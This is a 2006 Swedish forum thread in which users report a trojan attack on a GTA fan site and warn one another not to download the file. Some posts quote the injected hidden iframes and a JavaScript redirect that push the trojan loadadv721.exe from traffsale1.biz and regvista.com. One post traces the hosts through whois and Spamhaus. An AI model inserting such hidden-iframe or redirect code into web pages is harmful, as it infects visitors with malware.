GTAsajten utsatt för trojanattack.

[SlewME]

Det ser ut som om att GTAsajten är utsatt för en trojanattack. Råder alla till att INTE ladda ner filen!

Ladda alltså INTE ner filen!

[rabarben]

Moderatorer gör ett annoncement!

[SlewME]

Moderatorer gör ett annoncement!

Frågat kaller om detta. Tror inte att det går i denna version, han kände i alla fall inte till något.

[StellHell]

Ja, SlewME snackar inte i nattmössan.

LADDA INTE NER TROJANEN

Vi försöker få tag på Hultenius så snabbt som möjligt. Tillsvidare lär forumet vara aningen dött.

[SlewME]

Hultan kanske ska se över hurvida IPB 2 är aktuellt. IPB 1.3 är som sagt en gammal ipbversion och inte lika säker som senare IPB-versioner.

Hoppas denna trojan har bevisat att det är dags att uppgradera forumet.

[StellHell]

Hultan kanske ska se över hurvida IPB 2 är aktuellt. IPB 1.3 är som sagt en gammal ipbversion och inte lika säker som senare IPB-versioner.

Hoppas denna trojan har bevisat att det är dags att uppgradera forumet.

Ett IPB v2.1.5 forum blev infekterat igår med. Så, ja.. Spela roll.

[SlewME]

Ett IPB v2.1.5 forum blev infekterat igår med. Så, ja.. Spela roll.

Hm, det visste jag inte. Får kanske se över säkerheten på mina forum då trojanen förmodligen säker igenom forumet efter länkar till andra forum, inte omöjligt.

Usch för den där.

Sidan ser dock normal ut för mig nu i och med att jag blockerat hiddenframes i min brandvägg.

Redigerad 2 maj, 2006 av SlewME

[rabarben]

Här står det om trojanen

[BigBear]

Tänkte precis skapa tråd, fan problem att komma in på forumet. NOD32 har fått fnatt. Polarn har även fått mail om att tanka filen loadadv721.exe

Aja, hoppas ingen är dum nog och tankar.

[SlewME]

Tänkte precis skapa tråd, fan problem att komma in på forumet. NOD32 har fått fnatt. Polarn har även fått mail om att tanka filen loadadv721.exe

Aja, hoppas ingen är dum nog och tankar.

Japp, Nod32 gillade inte filen som tur var. Hoppas på att hultan är snabb och åtgärdar detta.

" <AD- me src="http://traffsale1.biz/dl/adv721.php" width=1 height=1><AD- ame>

<!-- pt language="JavaScript">window.location.href = "http://traffsale1.biz/dl/loadadv721.exe"</scri-->"

Redigerad 2 maj, 2006 av SlewME

[rabarben]

Går det att ta bort den om du tar full system scan på norton?

[StellHell]

Kan lika gärna skriva det här också.

can confirm the site has been hacked with the same hack as before, IFRAME in the User header linking to the exploit.

Using a different browser is not the solution, getting rid of the goddamn virus is

And why isn't that shit ass traffsale.biz site SHUT DOWN! These adware people are the scourge of the earth. I would like to break all of their fingers for coding this shit.

Indeed, the board seems to have been exploited. Viewing the source yields this:

CODE

<iframe src="http://196.regvista.com/index.php?ref=wde" width="0" height="0" frameborder="0"></iframe>

The URL in particular redirects to an affrontgl.com-address. Seems like it generates a unique one too, how considerate...

However, the affrontgl.com nameservers seem quite unresponsive. Let's see if we can figure out more about them...

CODE

  Domain Name: AFFRONTGL.COM

  Registrar: ONLINE SAS

  Whois Server: whois.bookmyname.com

  Referral URL: http://www.bookmyname.com

  Name Server: AA.CHARISMDE.COM

  Name Server: BB.CHARISMDE.COM

  Status: ACTIVE

  Updated Date: 05-mar-2006

  Creation Date: 19-feb-2006

  Expiration Date: 19-feb-2007

AA.CHARISMDE.COM        A      219.72.229.209

bb.charismde.com        A      220.248.227.112

Searching for nameservers with the same IP as the secondary yields the following:

CODE

BB.COBBLYEA.COM

BB.CHARISMDE.COM

DD.GROOMISHNL.COM

AA.HERDSMANIF.COM

AV.METEYARDBM.COM

RR.GUSSIELJ.COM

EE.VANGELIHN.COM

BB.GALLICEN.COM

CE.NICENISTCE.COM

Let's ask spamhaus.

CODE

219.72.229.209 is listed in the SBL, in the following records:

  SBL39300

Hmm, interesting (though not surprising). Let's see what they've been up to.

CODE

219.72.229.209/32 is listed on the Register Of Known Spam Operations (ROKSO) database as being assigned to, under the control of, or providing service to a known professional spam operation

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL39300

Bah, spammers.

Looking up 196.regvista.com (85.255.115.196) yields another record, SBL36702...

CODE

DNSChanger Trojan home

http://vil.mcafeesecurity.com/vil/content/v_136602.htm

Symptoms

* Presence of the file:

o %SYSTEMROOT%\SYSTEM32\HGQHP.EXE

* Having DNS entries in any of your network adaptors with the values:

o 85.255.112.132

o 85.255.113.13

* Finding traffic targeting:

o 195.95.218.100

Hultan, var är du?

[rabarben]

Wiiie! Startade om datorn och det kommer inte upp några rutor från norton längre... Betyder det att trojanskiten är borta?

[P-C]

Fixa dirr!

[GiZmo]

Wiiie! Startade om datorn och det kommer inte upp några rutor från norton längre... Betyder det att trojanskiten är borta?

Nepp, den är kvar :/

[Xemtoth]

Fick virusvarning, tog bort den när den av någon rolig anledning kom till datorn

[I lol]

Fy fan =/

Sökte på google vad Traffsale1.biz, kom till någon sida (China Defense (Nej jag kan inte kinesiska, det stod nog på engelska).)

Där stod det hur man tar bort den om man blir smittad.

[Vice.]

HELVETE!!!! Jag skulle trycka på add peply och då dök den jävla rutan upp och jag klickade ja. En ruta kom upp var vill du spara? Men jag avbröt. Fick jag viruset på datorn???

Vem fan har fixat detta? Sur banndad medlem?

[Juster]

HELVETE!!!! Jag skulle trycka på add peply och då dök den jävla rutan upp och jag klickade ja. En ruta kom upp var vill du spara? Men jag avbröt. Fick jag viruset på datorn???

Vem fan har fixat detta? Sur banndad medlem?

Jag tror inte du fick viruset på datorn som tur är

damn småirriterande popup då

[chucky.swe]

Tror jag inte eftersom den har drabbat flera forum..

HULTAN!!! var är du vi behöver dig nu!!